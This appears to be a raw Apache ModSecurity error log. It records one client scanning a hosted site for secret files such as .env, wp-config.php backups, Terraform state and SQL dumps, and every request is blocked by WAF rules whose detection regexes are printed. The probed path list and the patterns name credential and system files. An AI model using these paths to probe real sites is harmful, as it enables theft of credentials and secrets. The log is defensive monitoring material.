[Tue May 26 13:39:35.256787 2026] [security2:error] [pid 544395:tid 544626] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVPhmrs7g3RMCdp8XIxAAAAGU"]
[Tue May 26 13:39:35.307865 2026] [security2:error] [pid 536875:tid 536931] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp7wAA0jc"]
[Tue May 26 13:39:35.312068 2026] [security2:error] [pid 536875:tid 537002] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/api/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp8AAAyH4"]
[Tue May 26 13:39:35.314873 2026] [security2:error] [pid 536875:tid 536997] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/backend/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp8gAAyHk"]
[Tue May 26 13:39:35.367827 2026] [security2:error] [pid 536875:tid 536945] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/service/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp_QAAtkU"]
[Tue May 26 13:39:35.371893 2026] [security2:error] [pid 536875:tid 536949] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/services/.env"] [unique_id "ahVVP-r_-FTveSGlx1Hp_gAAvUk"]
[Tue May 26 13:39:35.461084 2026] [security2:error] [pid 536875:tid 536963] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shared/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqCAAA6Vc"]
[Tue May 26 13:39:35.463950 2026] [security2:error] [pid 536875:tid 536952] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shop/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqCQAA6Uw"]
[Tue May 26 13:39:35.473251 2026] [security2:error] [pid 536875:tid 536988] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/src/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqDwAA3XA"]
[Tue May 26 13:39:35.553958 2026] [core:crit] [pid 544395:tid 544650] (13)Permission denied: [client 40.77.167.132:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:35.612219 2026] [security2:error] [pid 536875:tid 536978] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/srv/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqHgAAqGY"]
[Tue May 26 13:39:35.612277 2026] [security2:error] [pid 536875:tid 536979] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stage/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqHQAAqGc"]
[Tue May 26 13:39:35.613012 2026] [security2:error] [pid 536875:tid 536971] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/staging/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqIAAAqF8"]
[Tue May 26 13:39:35.747999 2026] [security2:error] [pid 536875:tid 536974] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stg/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqJAAAj2I"]
[Tue May 26 13:39:35.757526 2026] [security2:error] [pid 536875:tid 536878] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stripe/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqKwAA4gI"]
[Tue May 26 13:39:35.758192 2026] [cgid:error] [pid 536875:tid 536881] [remote 45.148.10.95:51320] AH01264: stderr from /home2/whitece9/public_html/sysinfo.cgi: script not found or unable to stat
[Tue May 26 13:39:35.808551 2026] [security2:error] [pid 536875:tid 536876] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVVP-r_-FTveSGlx1HqMgAAsQA"]
[Tue May 26 13:39:35.900622 2026] [security2:error] [pid 536875:tid 536886] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/test.php"] [unique_id "ahVVP-r_-FTveSGlx1HqNwABAAo"]
[Tue May 26 13:39:35.902562 2026] [security2:error] [pid 536875:tid 536943] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/test/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqOAABAEM"]
[Tue May 26 13:39:35.904076 2026] [security2:error] [pid 536875:tid 536960] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v1/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqPgABAFQ"]
[Tue May 26 13:39:35.904125 2026] [security2:error] [pid 536875:tid 536889] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/user/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqPAABAA0"]
[Tue May 26 13:39:35.904404 2026] [security2:error] [pid 536875:tid 536890] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v2/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqQAABAA4"]
[Tue May 26 13:39:35.905763 2026] [security2:error] [pid 536875:tid 536892] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v3/.env"] [unique_id "ahVVP-r_-FTveSGlx1HqQQABABA"]
[Tue May 26 13:39:36.056877 2026] [security2:error] [pid 536875:tid 536907] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqUwABAh8"]
[Tue May 26 13:39:36.101473 2026] [security2:error] [pid 536875:tid 536984] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/var/www/html/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqVAAAhmw"]
[Tue May 26 13:39:36.192105 2026] [security2:error] [pid 536875:tid 536913] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/web/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqVwAAlSU"]
[Tue May 26 13:39:36.247365 2026] [security2:error] [pid 536875:tid 536918] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/website/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqZQAAoio"]
[Tue May 26 13:39:36.343187 2026] [security2:error] [pid 536875:tid 536923] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.new"] [unique_id "ahVVQOr_-FTveSGlx1HqawAA4S8"]
[Tue May 26 13:39:36.343195 2026] [security2:error] [pid 536875:tid 536926] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahVVQOr_-FTveSGlx1HqbAAA4TI"]
[Tue May 26 13:39:36.343214 2026] [security2:error] [pid 536875:tid 536930] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahVVQOr_-FTveSGlx1HqagAA4TY"]
[Tue May 26 13:39:36.343827 2026] [security2:error] [pid 536875:tid 536919] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/wp-config.php"] [unique_id "ahVVQOr_-FTveSGlx1HqaQAA4Ss"]
[Tue May 26 13:39:36.345688 2026] [security2:error] [pid 536875:tid 536909] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/wp-content/mysql.sql"] [unique_id "ahVVQOr_-FTveSGlx1HqbgAA4SE"]
[Tue May 26 13:39:36.491688 2026] [security2:error] [pid 544395:tid 544652] [client 45.148.10.95:9680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVQBmrs7g3RMCdp8XI4wAAAH8"]
[Tue May 26 13:39:36.493110 2026] [security2:error] [pid 544395:tid 544493] [remote 74.7.241.58:54164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVVQBmrs7g3RMCdp8XI5QAAVGE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 13:39:36.625336 2026] [autoindex:error] [pid 536875:tid 537116] [client 45.148.10.95:9730] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:36.647885 2026] [security2:error] [pid 536875:tid 537090] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqegAAANo"]
[Tue May 26 13:39:36.757413 2026] [security2:error] [pid 544395:tid 544549] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "whitesun.in"] [uri "/*update.cgi*"] [unique_id "ahVVQBmrs7g3RMCdp8XI7QAAABg"]
[Tue May 26 13:39:36.764928 2026] [security2:error] [pid 544395:tid 544628] [client 45.148.10.95:9744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/.env"] [unique_id "ahVVQBmrs7g3RMCdp8XI7wAAAGc"]
[Tue May 26 13:39:36.877304 2026] [security2:error] [pid 536875:tid 537117] [client 45.148.10.95:9796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVVQOr_-FTveSGlx1HqgAAAAPU"]
[Tue May 26 13:39:36.907375 2026] [security2:error] [pid 544395:tid 544625] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.bak"] [unique_id "ahVVQBmrs7g3RMCdp8XI9QAAAGQ"]
[Tue May 26 13:39:36.922975 2026] [security2:error] [pid 544395:tid 544597] [client 45.148.10.95:9760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env"] [unique_id "ahVVQBmrs7g3RMCdp8XI-AAAAEg"]
[Tue May 26 13:39:37.018641 2026] [security2:error] [pid 544395:tid 544601] [client 45.148.10.95:9812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.backup"] [unique_id "ahVVQRmrs7g3RMCdp8XI_AAAAEw"]
[Tue May 26 13:39:37.228676 2026] [security2:error] [pid 544395:tid 544615] [client 45.148.10.95:9744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.old"] [unique_id "ahVVQRmrs7g3RMCdp8XJCQAAAFo"]
[Tue May 26 13:39:37.239692 2026] [security2:error] [pid 536875:tid 537059] [client 45.148.10.95:9892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.env.php"] [unique_id "ahVVQer_-FTveSGlx1HqkAAAALs"]
[Tue May 26 13:39:37.274050 2026] [security2:error] [pid 544395:tid 544606] [client 45.148.10.95:9834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env.swp"] [unique_id "ahVVQRmrs7g3RMCdp8XJDAAAAFE"]
